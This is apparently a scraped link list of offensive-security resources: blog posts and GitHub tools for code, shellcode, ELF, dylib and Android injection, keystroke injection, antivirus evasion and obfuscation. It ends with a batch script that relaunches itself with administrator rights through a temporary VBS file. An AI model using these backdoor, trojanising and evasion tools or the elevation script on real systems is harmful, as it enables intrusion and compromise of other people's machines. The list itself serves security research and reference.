- 2013.08 [scotthelme] Code Injection - TLS (SSL) is not all about privacy, it’s about integrity too
- 2013.08 [sans] BBCode tag “[php]” used to inject php code
- 2013.05 [hackingarticles] Exploit Remote PC using Firefox 17.0.1 + Flash Privileged Code Injection
- 2012.12 [hackingarticles] Bypassing Antivirus using Multi Pyinjector Shell Code Injection in SET Toolkit
- 2012.11 [debasish] Suicide via Remote Code Injection
- 2012.10 [volatility] Reverse Engineering Poison Ivy’s Injected Code Fragments
- 2012.08 [cert] More human than human – Flame’s code injection techniques
- 2012.07 [welivesecurity] Rovnix.D: the code injection story
- 2012.06 [welivesecurity] ZeroAccess: code injection chronicles
- 2012.06 [hackingarticles] How to Attack on Remote PC using HTTP Code Injection Technique
- 2012.02 [trustwave] [Honeypot Alert] phpMyAdmin Code Injection Attacks for Botnet Recruitment
- 2011.06 [forcepoint] Malware campaign uses direct injection of Java exploit code
- 2009.01 [arxiv] [0901.3482] Code injection attacks on harvard-architecture devices
- 2008.11 [travisgoodspeed] MicaZ Code Injection
- 2008.09 [secshoggoth] SEO Code Injection
- 2008.07 [reverse] Mac OS X Code injection
- 2007.09 [travisgoodspeed] Memory-Constrained Code Injection
- 2007.02 [sans] more code injection sites 8.js
Shellcode Injection
Tools
- [2209Star][4m] [Py] trustedsec/unicorn Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
- [476Star][21d] [Py] trustedsec/meterssh a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection.
- [225Star][4m] [PS] outflanknl/excel4-dcom PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe)
- [112Star][2m] [C++] josh0xa/threadboat uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
- [77Star][4m] [C] dimopouloselias/simpleshellcodeinjector receives as an argument a shellcode in hex and executes it
- [66Star][2m] [Py] sensepost/anapickle Toolset for writing shellcode in Python’s Pickle language and for manipulating pickles to inject shellcode.
- [43Star][1m] [Py] borjamerino/tlsinjector Python script to inject and run shellcodes through TLS callbacks
- [27Star][2y] [Py] taroballzchen/shecodject shecodject is a autoscript for shellcode injection by Python3 programing
- [19Star][5y] [C] jorik041/cymothoa Cymothoa is a backdooring tool, that inject backdoor’s shellcode directly into running applications. Stealth and lightweight…
- [16Star][9m] [PLpgSQL] michaelburge/redshift-shellcode Example of injecting x64 shellcode into Amazon Redshift
- [10Star][1y] [C++] egebalci/injector Simple shellcode injector.
- [4Star][3y] [Shell] thepisode/linux-shellcode-generator Experiments on Linux Assembly shellcodes injection
- [NoneStar][Go] pioneerhfy/goback GOback is a backdoor written in GO that use shellcode injection technique for achiving its task.
Post
- 2020.03 [hakin9] Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.
- 2019.11 [ColinHardy] Excel 4.0 Macros Analysis - Cobalt Strike Shellcode Injection
- 2018.05 [cobaltstrike] PowerShell Shellcode Injection on Win 10 (v1803)
- 2017.12 [pentesttoolz] Shecodject – Autoscript for Shellcode Injection
- 2017.12 [MalwareAnalysisForHedgehogs] Malware Analysis - ROKRAT Unpacking from Injected Shellcode
- 2017.01 [christophertruncer] Shellcode Generation, Manipulation, and Injection in Python 3
- 2015.12 [dhavalkapil] Shellcode Injection
- 2015.12 [n0where] Dynamic Shellcode Injection: Shellter
- 2015.07 [BsidesLisbon] BSidesLisbon2015 - Shellter - A dynamic shellcode injector - Kyriakos Economou
- 2015.06 [shelliscoming] TLS Injector: running shellcodes through TLS callbacks
- 2014.08 [toolswatch] Shellter v1.7 A Dynamic ShellCode Injector – Released
- 2014.06 [toolswatch] [New Tool] Shellter v1.0 A Dynamic ShellCode Injector – Released
- 2013.06 [debasish] Injecting Shellcode into a Portable Executable(PE) using Python
- 2013.05 [trustedsec] Native PowerShell x86 Shellcode Injection on 64-bit Platforms
- 2012.10 [hackingarticles] Cymothoa – Runtime shellcode injection Backdoors
- 2012.09 [hackingarticles] PyInjector Shellcode Injection attack on Remote PC using Social Engineering Toolkit
- 2012.08 [trustedsec] New tool PyInjector Released – Python Shellcode Injection
ELF Injection
Tools
- [269Star][10d] [Shell] cytopia/pwncat pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
- [106Star][14d] [C] comsecuris/luaqemu QEMU-based framework exposing several of QEMU-internal APIs to a LuaJIT core injected into QEMU itself. Among other things, this allows fast prototyping of target systems without any native code and minimal effort in Lua.
- [73Star][10d] [C] zznop/drow Injects code into ELF executables post-build
- [45Star][1m] [C] jmpews/evilelf Malicious use of ELF such as .so inject, func hook and so on.
- [26Star][4m] [C++] shaxzy/nixware-csgo Source code of Nixware. Cheat doesn’t inject for some reason, fix it uself or just paste from it
- [9Star][3m] [C] mfaerevaag/elfinjector Code injector for ELF binaries (incl. PIE)
- [1Star][2y] [JS] mshoop/web-xss-attack Exploring website security through cross-site scripting attacks, maliciously injected JavaScript and self-propagating worms
Post
- 2020.02 [advancedpersistentjest] Fault Injection on Linux: Practical KERNELFAULT-Style Attacks
- 2018.08 [0x00sec] Issues with elf file injection tutorial by pico
-
2017.12 [MSbluehat] [BlueHat v17 KERNELFAULT: R00ting the Unexploitable using Hardware Fault Injection](https://www.slideshare.net/MSbluehat/kernelfault-r00ting-the-unexploitable-using-hardware-fault-injection) - 2016.05 [0x00sec] ELFun File Injector
- 2016.04 [backtrace] ELF shared library injection forensics
- 2014.02 [malwarebytes] How to Unpack a Self-Injecting Citadel Trojan
- 2014.02 [evilsocket] Termination and Injection Self Defense on Windows >= Vista SP1
- 2010.03 [publicintelligence] ELF/VLF Wave-injection and Magnetospheric Probing with HAARP
Dylib Injection
Tools
- [2032Star][3y] [Swift] urinx/iosapphook 专注于非越狱环境下iOS应用逆向研究,从dylib注入,应用重签名到App Hook
- [752Star][5y] [ObjC] kjcracks/yololib dylib injector for mach-o binaries
- [506Star][13d] [Objective-C++] bishopfox/bfinject Dylib injection for iOS 11.0 - 11.1.2 with LiberiOS and Electra jailbreaks
- [191Star][3m] [Swift] codesourse/iinjection an app for OS X that can inject dylib and (re)sign apps and bundle them into ipa files that are ready to be installed on an iOS device.
- [173Star][16d] [C] scen/osxinj osx dylib injection
Post
Android
Tools
- [1300Star][4m] [JS] megatronking/httpcanary A powerful capture and injection tool for the Android platform
- [475Star][3y] [Smali] sensepost/kwetza Python script to inject existing Android applications with a Meterpreter payload.
- [447Star][9m] [Java] megatronking/netbare Net packets capture & injection library designed for Android
- [252Star][16d] [Py] feicong/jni_helper Android SO automatic injection
- [148Star][4m] [Java] zhouat/inject-hook for android
- [144Star][3y] [C] xmikos/setools-android Unofficial port of setools to Android with additional sepolicy-inject utility included
- [136Star][11d] [Lua] lanoox/luject A static injector of dynamic library for application (android, iphoneos, macOS, windows, linux)
- [122Star][5y] irsl/adb-backup-apk-injection Android ADB backup APK Injection POC
- [97Star][4y] [Shell] jlrodriguezf/whatspwn Linux tool used to extract sensitive data, inject backdoor or drop remote shells on android devices.
- [76Star][4y] [Py] moosd/needle Android framework injection made easy
- [56Star][4m] [C] shunix/tinyinjector Shared Library Injector on Android
- [55Star][4m] [Java] igio90/fridaandroidinjector Inject frida agents on local processes through an Android app
- [52Star][2m] [Py] alessandroz/pupy Pupy is an opensource, multi-platform (Windows, Linux, OSX, Android), multi function RAT (Remote Administration Tool) mainly written in python.
- [52Star][14d] [TS] whid-injector/whid-mobile-connector Android Mobile App for Controlling WHID Injector remotely.
- [48Star][16d] [Py] ikoz/jdwp-lib-injector inject native shared libraries into debuggable Android applications
- [46Star][30d] [Shell] jbreed/apkinjector Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.
- [40Star][8m] [Java] ivianuu/contributer Inject all types like views or a conductor controllers with @ContributesAndroidInjector
- [33Star][1y] [Groovy] eastwoodyang/autoinject Android 通用的组件自动注册、自动初始化解决方案
- [30Star][6m] [Java] cristianturetta/mad-spy We developed a malware for educational purposes. In particular, our goal is to provide a PoC of what is known as a Repacking attack, a known technique widely used by malware cybercrooks to trojanize android apps. The answer to solve this particular goal boils down in the simplicity of APK decompiling and smali code injection.
- [24Star][5m] [Smali] aress31/sci Framework designed to automate the process of assembly code injection (trojanising) within Android applications.
- [13Star][11m] [JS] cheverebe/android-malware Injected malicious code into legitimate andoid applications. Converted a keyboard app into a keylogger and an MP3 downloader into an image thief.
Post
- 2017.06 [securelist] Dvmap: the first Android malware with code injection
- 2015.05 [evilsocket] Android Native API Hooking With Library Injection and ELF Introspection.
- 2015.05 [evilsocket] Dynamically Inject a Shared Library Into a Running Process on Android/ARM
Other
Tools
- [1044Star][11d] [Go] banzaicloud/bank-vaults A Vault swiss-army knife: a K8s operator, Go client with automatic token renewal, automatic configuration, multiple unseal options and more. A CLI tool to init, unseal and configure Vault (auth methods, secret engines). Direct secret injection into Pods.
- [980Star][12d] [Perl] infobyte/evilgrade a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates
- [920Star][4m] [C++] whid-injector/whid WiFi HID Injector - An USB Rubberducky / BadUSB On Steroids.
- [877Star][7m] [C] spacehuhn/wifi_ducky Upload, save and run keystroke injection payloads with an ESP8266 + ATMEGA32U4
- [577Star][19d] [TS] samdenty/injectify Perform advanced MiTM attacks on websites with ease
- [559Star][28d] [Py] shellphish/fuzzer A Python interface to AFL, allowing for easy injection of testcases and other functionality.
- [555Star][11d] [C] libnet/libnet an API to help with the construction and injection of network packets.
- [509Star][10d] [C] nongiach/sudo_inject [Linux] Two Privilege Escalation techniques abusing sudo token
- [501Star][7m] [C] hasherezade/demos Demos of various injection techniques found in malware
- [463Star][12d] [Perl] chinarulezzz/pixload Image Payload Creating/Injecting tools
- [427Star][11d] payloadbox/command-injection-payload-list an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application
- [420Star][2y] [C++] rootm0s/injectors DLL/Shellcode injection techniques
- [380Star][15d] veracode-research/solr-injection Apache Solr Injection Research
- [380Star][15d] veracode-research/solr-injection Apache Solr Injection Research
- [356Star][8d] [C++] spacehuhntech/wifiduck Wireless keystroke injection attack platform
- [320Star][2y] [C++] exploitagency/esploitv2 WiFi Keystroke Injection Tool designed for an Atmega 32u4/ESP8266 Paired via Serial (Cactus WHID Firmware). Also features Serial, HTTP, and PASV FTP exfiltration methods and an integrated Credential Harvester Phishing tool called ESPortal.
- [317Star][10d] [Py] pmsosa/duckhunt Prevent RubberDucky (or other keystroke injection) attacks
- [308Star][12d] [C] pulkin/esp8266-injection-example Example project to demonstrate packet injection / sniffer capabilities of ESP8266 IC.
- [299Star][18d] [HTML] dxa4481/cssinjection Stealing CSRF tokens with CSS injection (without iFrames)
- [297Star][2y] [C] can1357/theperfectinjector Literally, the perfect injector.
- [284Star][4m] [C++] fransbouma/injectablegenericcamerasystem This is a generic camera system to be used as the base for cameras for taking screenshots within games. The main purpose of the system is to hijack the in-game 3D camera by overwriting values in its camera structure with our own values so we can control where the camera is located, it’s pitch/yaw/roll values, its FoV and the camera’s look vector.
- [265Star][19d] [C] astsam/rtl8812au RTL8812AU/21AU and RTL8814AU driver with monitor mode and frame injection
- [265Star][17d] [Java] portswigger/collaborator-everywhere A Burp Suite Pro extension which augments your proxy traffic by injecting non-invasive headers designed to reveal backend systems by causing pingbacks to Burp Collaborator
- [264Star][2y] [Py] thetwitchy/xxer A blind XXE injection callback handler. Uses HTTP and FTP to extract information. Originally written in Ruby by ONsec-Lab.
- [255Star][14d] [Py] nteseyes/pylane An python vm injector with debug tools, based on gdb.
- [254Star][16d] [C] klsecservices/invoke-vnc executes a VNC agent in-memory and initiates a reverse connection, or binds to a specified port.
- [242Star][11d] [JS] sjitech/proxy-login-automator A single node.js script to automatically inject user/password to http proxy server via a local forwarder
- [215Star][12d] [Py] google/ukip USB Keystroke Injection Protection
- [212Star][2y] [HTML] xsscx/commodity-injection-signatures Commodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT
- [211Star][12d] [C++] hiitiger/gelectron gameoverlay solution for Electron, Qt and CEF, just like discord game overlay and steam game overlay, inject any app to overlay in your game
- [197Star][5y] [Py] offensivepython/pinject Raw Packet Injection tool
- [170Star][3y] [HTML] threatexpress/metatwin The project is designed as a file resource cloner. Metadata, including digital signature, is extracted from one file and injected into another.
- [158Star][11d] [C] aircrack-ng/rtl8188eus RealTek RTL8188eus WiFi driver with monitor mode & frame injection support
- [157Star][7d] icehacks/survivcheatinjector An actual, updated, surviv.io cheat. Works great and we reply fast.
- [149Star][25d] [Shell] depoon/iosdylibinjectiondemo Using this Repository to demo how to inject dynamic libraries into cracked ipa files for jailed iOS devices
- [144Star][2m] [Py] shengqi158/pyvulhunter python audit tool 审计 注入 inject
- [141Star][18d] [Ruby] dry-rb/dry-auto_inject Container-agnostic constructor injection mixin
- [140Star][12d] [Go] malfunkt/arpfox An arpspoof alternative (written in Go) that injects spoofed ARP packets into a LAN.
- [135Star][16d] [Py] cr0hn/enteletaor Message Queue & Broker Injection tool
- [134Star][3m] [C++] michalmonday/supremeduck USB keystroke injector controlled by smartphone.
- [131Star][5y] [Py] ricterz/websocket-injection WebSocket 中转注入工具
- [127Star][18d] [Py] mandatoryprogrammer/xsshunter_client Correlated injection proxy tool for XSS Hunter
- [126Star][3y] [Batchfile] 3gstudent/clr-injection Use CLR to inject all the .NET apps
- [123Star][4m] [ObjC] smilezxlee/zxhookdetection 【iOS应用安全】hook及越狱的基本防护与检测(动态库注入检测、hook检测与防护、越狱检测、签名校验、IDA反编译分析加密协议示例)
- [118Star][2y] [C#] malcomvetter/managedinjection A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
- [117Star][5m] [C#] gaprogman/owaspheaders.core A .NET Core middleware for injecting the Owasp recommended HTTP Headers for increased security
- [117Star][2m] [C++] praetorian-code/vulcan a tool to make it easy and fast to test various forms of injection
- [114Star][2m] [Ruby] spiderlabs/beef_injection_framework Inject beef hooks into HTTP traffic and track hooked systems from cmdline
- [113Star][3y] [PS] vletoux/ntlminjector In case you didn’t now how to restore the user password after a password reset (get the previous hash with DCSync)
- [112Star][2y] cujanovic/crlf-injection-payloads Payloads for CRLF Injection
- [111Star][14d] [C++] haram/splendid_implanter BattlEye compatible injector, done completely from user-mode, project by secret.club
- [107Star][27d] [C] yurushao/droid_injectso A shared libraries injection tool.
- [106Star][4y] [Eagle] zapta/linbus An Arduino based LINBUS stack and signal interceptor/injector.
- [105Star][3y] [C++] azuregreen/injectcollection A collection of injection via vc++ in ring3
- [104Star][4y] [Makefile] dtrukr/flex_injected Injecting FLEX with MobileSubstrate. Inject FLEX library into 3rd party apps.
- [104Star][14d] [Py] tintinweb/electron-inject Inject javascript into closed source electron applications e.g. to enable developer tools for debugging.
- [102Star][14d] [C++] whid-injector/whid-31337 WHID Elite is a GSM-enabled Open-Source Multi-Purpose Offensive Device that allows a threat actor to remotely inject keystrokes, bypass air-gapped systems, conduct mousejacking attacks, do acoustic surveillance, RF replay attacks and much more. In practice, is THE Wet Dream of any Security Consultant out there!
- [93Star][16d] [Py] pdjstone/wsuspect-proxy Python tool to inject fake updates into unencrypted WSUS traffic
- [92Star][2y] [C] 3gstudent/inject-dll-by-process-doppelganging Process Doppelgänging
- [89Star][1m] [C] xpn/ssh-inject A ptrace POC by hooking SSH to reveal provided passwords
- [87Star][10d] [Py] helpsystems/wiwo wiwo is a distributed 802.11 monitoring and injecting system that was designed to be simple and scalable, in which all workers (nodes) can be managed by a Python framework.
- [86Star][4m] [Java] pwntester/dupekeyinjector DupeKeyInjector
- [86Star][9m] [Py] safebreach-labs/bitsinject A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service), allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account
- [83Star][1m] [Go] binject/binjection Injects additional machine instructions into various binary formats.
- [83Star][11d] [JS] fastify/light-my-request Fake HTTP injection library
- [83Star][17d] [C] oleavr/ios-inject-custom Example showing how to use Frida for standalone injection of a custom payload
- [82Star][4m] [C++] changeofpace/mouclassinputinjection MouClassInputInjection implements a kernel interface for injecting mouse input data packets into the input data stream of HID USB mouse devices.
- [78Star][2y] [C] alex9191/kernel-dll-injector Kernel-Mode Driver that loads a dll into every new created process that loads kernel32.dll module
- [78Star][3y] [C] ernacktob/esp8266_wifi_raw ESP8266 wifi packet injection and receiving experiment
- [75Star][17d] [C] liji32/mip MIP – macOS Injection Platform
- [74Star][2y] [C++] 3gstudent/inject-dll-by-apc Asynchronous Procedure Calls
- [72Star][2m] [C#] komefai/ps4remoteplayinterceptor A small .NET library to intercept and inject controls on PS4 Remote Play for Windows
- [70Star][8m] [JS] lfzark/cookie-injecting-tools A chrome extension ,cookie injecting tool includeing injecting ,editing ,adding ,removeing cookies.
- [68Star][21d] bastilleresearch/keyjack Device discovery tools and encrypted keystroke injection advisories for Logitech, Dell, Lenovo and AmazonBasics
- [67Star][2m] [C] merlijnwajer/tracy tracy - a system call tracer and injector. Find us in #tracy on irc.freenode.net
- [66Star][4m] [YARA] fuzzysecurity/bluehatil-2020 BlueHatIL 2020 - Staying # and Bringing Covert Injection Tradecraft to .NET
- [64Star][4m] [C++] changeofpace/mouhidinputhook MouHidInputHook enables users to filter, modify, and inject mouse input data packets into the input data stream of HID USB mouse devices without modifying the mouse device stacks.
- [62Star][8m] [C] gdbinit/osx_boubou A PoC Mach-O infector via library injection
- [62Star][2m] [Py] feexd/vbg Visual Basic GUI: A Tool to Inject Keystrokes on a SSH Client via an X11 Forwarded Session
- [61Star][11d] [JS] tserkov/vue-plugin-load-script A Vue plugin for injecting remote scripts.
- [58Star][12d] [Py] adhorn/aws-chaos-scripts Collection of python scripts to run failure injection on AWS infrastructure
- [57Star][5y] [C++] scadacs/plcinject
- [57Star][3m] [C] jar-o/osxinj_tut OSX injection tutorial: Hello World
- [56Star][3y] [C++] mq1n/dllthreadinjectiondetector
- [56Star][2m] [HTML] webcoding/js_block 研究学习各种拦截:反爬虫、拦截ad、防广告注入、斗黄牛等
- [53Star][1m] [C++] vmcall/eye_mapper BattlEye x64 usermode injector
- [52Star][4m] [Go] stakater/proxyinjector A Kubernetes controller to inject an authentication proxy container to relevant pods - [✩Star] if you’re using it!
- [52Star][29d] [C] pwn20wndstuff/injector
- [51Star][4m] [C++] anubisss/szimatszatyor World of Warcraft (WoW): SzimatSzatyor is an injector sniffer written in C++
- [51Star][4y] [C++] uitra/injectora x86/x64 manual mapping injector using the JUCE library
- [51Star][7m] [ObjC] kpwn/inj task_for_pid injection that doesn’t suck
- [50Star][9y] [Perl] spiderlabs/thicknet TCP session interception and injection framework
- [49Star][3m] [JS] pownjs/pown-duct Essential tool for finding blind injection attacks.
- [48Star][14d] [Py] nickstadb/patch-apk Wrapper to inject an Objection/Frida gadget into an APK, with support for app bundles/split APKs.
- [47Star][3y] [Shell] leanvel/iinject Tool to automate the process of embedding dynamic libraries into iOS applications from GNU/Linux
- [47Star][11d] [Py] adhorn/aws-lambda-chaos-injection Chaos Injection library for AWS Lambda
- [46Star][1m] [C] gdbinit/gimmedebugah A small utility to inject a Info.plist into binaries.
- [46Star][6m] [C] cleric-k/flyskyrxfirmwarerssimod Patched firmwares for the various FlySky receivers to inject RSSI in IBUS channel 14
- [44Star][2y] [Py] nullbites/snakeeater Python implementation of the reflective SO injection technique
- [44Star][2m] [Py] ledger-donjon/rainbow Makes Unicorn traces. Generic Side-Channel and Fault Injection simulator
- [43Star][4m] [C#] equifox/minjector Mono Framework Injector (C#) using MInject Library
- [43Star][4y] [C++] sekoialab/binaryinjectionmitigation Two tools used during our analysis of the Microsoft binary injection mitigation implemented in Edge TH2.
- [42Star][4m] [Arduino] exploitagency/github-esploit !!! Deprecated See ESPloitV2 !!! Original PoC(Released: Sep 11, 2016) - WiFi controlled keystroke injection Using ESP8266 and 32u4 based Arduino HID Keyboard Emulator
- [39Star][4m] [Py] alttch/pptop Open, extensible Python injector/profiler/analyzer
- [38Star][10d] [C++] ganyao114/sandboxhookplugin demo for inject & hook in sandbox
- [37Star][1m] [JS] dangkyokhoang/man-in-the-middle Modify requests, inject JavaScript and CSS into pages
- [37Star][2m] [JS] jackgu1988/dsploit-scripts Scripts that could be injected in MITM attacks using dSploit
- [36Star][2m] [C] stealth/injectso
- [35Star][2y] [Java] minervalabsresearch/coffeeshot CoffeeShot: Avoid Detection with Memory Injection
- [35Star][24d] [Ruby] skulltech/apk-payload-injector POC for injecting Metasploit payloads on arbitrary APKs
- [35Star][7m] [Py] tidesec/tdscanner 自动化检测小工具,主要实现了域名枚举、链接爬取、注入检测、主机扫描、目录枚举、敏感信息检测等功能~
- [34Star][6y] osiris123/cdriver_loader Kernel mode driver loader, injecting into the windows kernel, Rootkit. Driver injections.
- [34Star][1m] [Py] rudsarkar/crlf-injector A CRLF ( Carriage Return Line Feed ) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
- [33Star][19d] [JS] ebay/userscript-proxy HTTP proxy to inject scripts and stylesheets into existing sites.
- [32Star][2m] [C++] netdex/twinject Automated player and hooking framework for bullet hell games from the Touhou Project
- [31Star][23d] [C++] amirrezanasiri/usb-keystroke-injector
- [29Star][3y] [Assembly] borjamerino/plcinjector Modbus stager in assembly and some scripts to upload/download data to the holding register of a PLC
- [29Star][18d] [C] misje/dhcpoptinj DHCP option injector
- [27Star][4m] [Py] fluxius/v2ginjector V2GInjector - Tool to intrude a V2G PowerLine network, but also to capture and inject V2G packets
- [27Star][3m] [Py] xfkxfk/pyvulhunter python audit tool 审计 注入 inject
- [25Star][9m] [Shell] civisanalytics/iam-role-injector Assumes an IAM role via awscli STS call, injecting temporary credentials into shell environment
- [25Star][5m] [C] hatching/tracy tracy - a system call tracer and injector. Find us in #tracy on irc.freenode.net
- [25Star][9m] [JS] sbarre/proxy-local-assets BrowserSync-based Gulpfile to inject local development assets into a remote site
- [24Star][2y] retrogamer74/firmwarev5.05_mirahen_baseinjection Mira HEN 5.05 PS4 Fast developed firmware just for the basic injection
- [23Star][1y] [JS] 0xsobky/xssbuster XSSB is a proactive DOM sanitizer, defending against client-side injection attacks!
- [23Star][1m] [C] kismetwireless/lorcon LORCON 802.11 Packet Injection Library (Mirror of Kismet repository)
- [22Star][4m] [C++] arsunt/tr2main Tomb Raider II Injector Dynamic Library
- [22Star][3y] [Cycript] keith/injecturlprotocol Inject a custom NSURLProtocl into a running application
- [22Star][2y] [Py] swisskyrepo/whid_toolkit Simple script for the WHID injector - a rubberducky wifi
- [21Star][4m] [Py] bountystrike/injectus CRLF and open redirect fuzzer
- [20Star][1m] [Py] migolovanov/libinjection-fuzzer This tool was written as PoC to article
- [20Star][2m] [Smarty] saltwaterc/aircrack-db A list of wireless cards tested with the dual-card injection test and in the field
- [19Star][1m] [Java] toparvion/jmint jMint is a Side Effect Injection (SEI) tool aimed at simplicity of modifications expression
- [17Star][2y] [Py] mostafasoliman/cve-2017-6079-blind-command-injection-in-edgewater-edgemarc-devices-exploit
- [17Star][2y] [C] paullj1/w-swfit x64 Windows Software Fault Injection Tool
- [16Star][7y] cccssw/jynkbeast A novel rootkit under linux(test under cents 5.4) combine with preload_inject and sys_table modify
- [16Star][12d] [JS] freehuntx/frida-inject This module allows you to easily inject javascript using frida and frida-load.
- [15Star][17d] [Py] ezelf/modbuskiller [#Schneider] Dos PLC Modicon via Modbus Injection
- [14Star][2y] chango77747/shellcodeinjector_msbuild
- [13Star][1y] [JS] lukaszmakuch/snabbdom-signature Protects your app against vnode injection.
- [13Star][2y] [C] mnavaki/faros FAROS: Illuminating In-Memory Injection Attacks via Provenance-based Whole System Dynamic Information Flow Tracking
- [12Star][3y] [C++] wyexe/x64injector
- [12Star][4m] [Java] orhun/apkservinject Tool for injecting (smali) services to APK files
- [11Star][7y] [Component Pascal] dilshan/kidogo Open Source USB Digital Signal Injector
- [11Star][2m] [C] resilar/psyscall Linux syscall() injection
- [11Star][9m] [C] wrenchonline/kernelapcinject
- [10Star][1y] [C#] guitmz/msil-cecil-injection Injection of MSIL using Cecil
- [10Star][26d] [C++] hrt/mouseinjectdetection Simple method of checking whether or not mouse movement or buttons (<windows 10) are injected
- [10Star][3m] [C++] jamesits/bgrtinjector Customize boot logo without modifying BIOS (UEFI firmware).
- [9Star][16d] [JS] davuxcom/frida-scripts Inject JS and C# into Windows apps, call COM and WinRT APIs
- [8Star][2y] [C++] xiaobo93/unmodule_shellcode_inject 无模块注入工程 VS2008
- [8Star][7m] [JS] omarkurt/ssjs SSJS Web Shell Injection Case
- [7Star][6m] [Shell] enixes/injectorist A simple script to check all Wireless cards connected to your computer for Packet Injection capability
- [7Star][2m] [C] idigitalflame/inyourmems Windows Antivirus Evasion and Memory Injection
- [7Star][2y] [CSS] kp625544/runtime_secure Injecting Security at run-time for web applications
- [7Star][5m] [ObjC] troyzhao/aanticrack 注入与反注入工具 Disabled the injection defenses tool
- [7Star][8m] [C] anyfi/wperf 802.11 frame injection/reception tool for Linux mac80211 stack
- [6Star][8y] [C++] yifanlu/psxperia-wrapper Loads injected PSX games on Xperia Play
- [6Star][5y] [C] mwwolters/dll-injection
- [6Star][2y] [C] moepinet/moepdefend Example monitoring/injection tool based on libmoep
- [6Star][3y] [JS] juzna/packet-injector Packet analyzer and injector, written in JavaScript
- [5Star][5m] [Java] zabuzaw/mem-eater-bug API that provides various methods for memory manipulation and injection using JNA.
- [5Star][6m] [C++] sh0/airown Packet injection tool
- [4Star][4m] [C#] mojtabatajik/.net-code-injector Proof of concept of .Net worms
- [3Star][1y] [JS] mhelwig/wp-webshell-xss A simple wordpress webshell injector
- [3Star][7m] [C++] sujuhu/antinject
- [2Star][4y] [c++] C4t0ps1s/injectme
- [2Star][6m] [Java] conanjun/xssblindinjector burp插件,实现自动化xss盲打以及xss log
-
[2Star][2y] [JS] mylesjohnson/pipe-injector Node.js script that can detect when “curl … bash” is being used and serve a different file than normal - [2Star][2y] [C] neocui/uefi-var-in-disk Inject the UEFI variable in the first sector of hard disk
- [2Star][2y] [C++] wqqhit/dnshijack A tool to poison a systems DNS cache by injecting faked DNS responses.
- [2Star][2y] [JS] xymostech/aphrodite-globals A library for injecting global-scope styles using Aphrodite.
- [2Star][4y] [C] derosier/packetvector 802.11 management packet injection tool based on packetspammer
- [2Star][2m] [C] trustedsec/inproc_evade_get-injectedthread PoC code from blog
- [1Star][2y] [C] abapat/dnspoison A DNS packet injection and poisoning detection utility
- [1Star][8y] [C++] iagox86/old-injector
- [1Star][8m] [Go] joanbono/pixload Image Payload Creating/Injecting tools
- [1Star][3y] [C++] bradleykirwan/disassociatedwifi A user space application for injecting packets into a WiFi interface in monitor mode.
- [1Star][8y] [C] iitis/iitis-generator Software for distributed statistical evaluation of IEEE 802.11 wireless networks using Linux mac80211 packet injection facility
- [1Star][2y] [Py] cardangi/xss-injector-python3- XSS PoC
- [1Star][6m] [Py] gunnargrosch/serverless-chaos-demo This example demonstrates how to use Adrian Hornsby’s Failure Injection Layer (
- [0Star][2y] [C] brorica/http_inject
- [0Star][1y] phuctam/server-side-template-injection-in-craftcms-
- [0Star][4y] [Py] dshtanger/zabbix_insertdb_injection_analy
- [NoneStar][JS] sajjadium/origintracer OriginTracer: An In-Browser System for Identifying Extension-based Ad Injection
- [NoneStar][C] kebugcheckex0xfffffff/kernel-dll-injector Kernel-Mode Driver that loads a dll into every new created process that loads kernel32.dll module
- [NoneStar][C++] contionmig/millin-injector Millin Injector offers many features which can aid in creating usermode cheats. Its meant to be light weight and allow users to view things such as loaded modules, imports and other smaller things
- [NoneStar][Java] zabuzard/mem-eater-bug API that provides various methods for memory manipulation and injection using JNA.
- [NoneStar][Py] roottusk/xforwardy Host Header Injection Scanner
- [NoneStar][C#] thenameless314159/sockethook Socket hook is an injector based on EasyHook which redirect the traffic to your local server.
(https://blog.scrt.ch/2020/06/19/engineering-antivirus-evasion/)
Obfuscation
https://github.com/xoreaxeaxeax/movfuscator
https://github.com/danielbohannon/Invoke-DOSfuscation
https://github.com/unixpickle/gobfuscate - GO Obfuscator
https://github.com/NotPrab/.NET-Obfuscator - Lists of .NET Obfuscator (Free, Trial, Paid and Open Source )
https://github.com/javascript-obfuscator/javascript-obfuscator - Javascript Obfuscator
https://github.com/danielbohannon/Invoke-Obfuscation - Powershell Obfuscator
https://github.com/BinaryScary/NET-Obfuscate - .NET IL Obfuscator
https://github.com/scrt/avcleaner - C/C++ source obfuscator for antivirus bypass
https://github.com/meme/hellscape - GIMPLE obfuscator for C, C++, Go, … all supported GCC targets and front-ends that use GIMPLE.
https://github.com/mgeeky/VisualBasicObfuscator - VBS Obfuscator
https://github.com/3xpl01tc0d3r/Obfuscator - Shellcode Obfuscator
https://github.com/EgeBalci/sgn - Shellcode Encoder
https://github.com/lengjibo/FourEye
https://github.com/swagkarna/Defeat-Defender
@echo off
:: BatchGotAdmin
::-------------------------------------
REM --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
set params = %*:"="
echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
del "%temp%\getadmin.vbs"
exit /B
:gotAdmin
pushd "%CD%"
CD /D "%~dp0"
